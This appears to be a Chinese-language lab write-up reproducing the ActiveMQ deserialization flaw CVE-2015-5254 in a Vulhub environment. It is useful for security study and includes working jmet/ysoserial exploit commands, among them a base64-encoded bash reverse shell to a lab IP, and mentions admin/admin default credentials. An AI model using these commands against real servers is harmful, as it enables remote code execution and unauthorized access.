本次复现,我们使用的是Vulhub里面的环境
地址:Vulhub - Docker-Compose file for vulnerability environment
安装按着他的来就行了,一般没有问题
安装之后进入目录开启环境就好了
目录
1. ActiveMQ 反序列化漏洞 (CVE-2015-5254)
2.ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
1.Apache Airflow 命令注入(CVE-2020-11978)
2.Airflow Celery Broker 远程命令执行 (CVE-2020-11981)
3.Apache Airflow 身份验证绕过 (CVE-2020-17526)
1. ActiveMQ 未授权访问
1. ActiveMQ 反序列化漏洞 (CVE-2015-5254)
通过访问admin登录,默认用户密码 admin/admin
利用这个环境我们需要使用jmet这个工具。首先下载jmet的jar文件,并在同目录下创建名为external的文件夹(否则可能会出现文件夹不存在的错误)
jmet是使用ysoserial生成Payload并发送(jar自带ysoserial,我们不用再下载),所以我们需要选择一个能在ysoserial中使用的gadget,比如ROME .
jmet: GitHub - matthiaskaiser/jmet: Java Message Exploitation Tool
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
在目录下创建extrnal 不然有报错信息
然后访问http://192.168.1.108:8161/admin/browse.jsp?JMSDestination=event
发现新增了记录
这里点击ID会触发命令执行的
我们可以通过docker查看命令有没有正常执行
我们发现命令成功执行在tmp下创建了sucess
我们继续执行反弹shell
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzQvMTkxMTEgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.1.108 61616
成功连接 复现结束
注意这个漏洞的利用在于传递信息,让管理员点击,就会造成漏洞
总结这个漏洞不需要登录密码,但需要管理员点击